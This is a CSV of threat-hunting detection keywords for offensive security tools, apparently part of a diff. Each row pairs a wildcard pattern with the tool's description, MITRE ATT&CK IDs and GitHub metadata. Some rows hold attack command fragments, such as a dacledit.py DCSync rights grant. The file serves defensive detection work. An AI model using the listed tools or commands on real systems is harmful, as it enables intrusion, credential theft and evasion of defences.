+"*D1rkInject-main*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D210570B-F1A0-4B66-9301-F7A54978C178*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
+"*d2hvYW1p*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*d3ckx1/Crack-allDBs*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z"
+"*d494a4bc-3867-436a-93ef-737f9e0522eb*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
+"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*D4Vinci*","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. 
Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*DA230B64-14EA-4D49-96E1-FA5EFED9010B*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dacledit.py -action write -rights DCSync -principal * -target-dn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 
- T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*daem0nc0re/PrivFu*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*dafthack/HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" +"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*dafthack/MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*DallasFR/Cobalt-Clip*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*DallasFR/WinShellcode*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - 
T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*DAMP-master.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*DancingRightToLeft.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*danielbohannon*","offensive_tool_keyword","Github Username","Github user author of powershell obfuscation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/danielbohannon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*danielmiessler/SecLists*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*danielmiessler/SecLists.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*DanMcInerney/Empire*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*DanMcInerney/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*DanMcInerney/net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. 
Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*DanMcInerney/theHarvester*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*daphne-main.zip*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*daphne-x64 * pid=*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*darkarmour.py*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*darkarmour-master*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*DarkCoderSc/SharpShellPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*darkhotel backdoor*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*DarkHotel C2*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*darkhotel data exfil server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter 
Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*darkhotel_headers*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*DarkLoadLibrary-maser*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*darkr4y/geacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*DarkRCovery.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*DarkWidow-main*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*das add -db dbname masscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das add -db dbname rustscan *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das report -hosts 192.168.1.0/24 -oA report2*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*das scan -db dbname -ports 22*80*443*445 -show*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dashlane2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*data/ipwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*data/payloads/stager.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*data/shell/backdoors*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/shell/stagers*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*data/wordlist_256.txt*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*data/wordlists*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Data\VulnerableCOM.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*DataSploit*","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","227","669","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" +"*datr=80ZzUfKqDOjwL8pauwqMjHTa*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*DavidXanatos/DiskCryptor*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DavRelayUp.csproj*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a 
universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.exe*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp.sln*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*DavRelayUp-master*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*dazzleUP.cna*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation 
vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.sln*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.vcxproj*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.x32.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*dazzleUP.x64.exe*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - 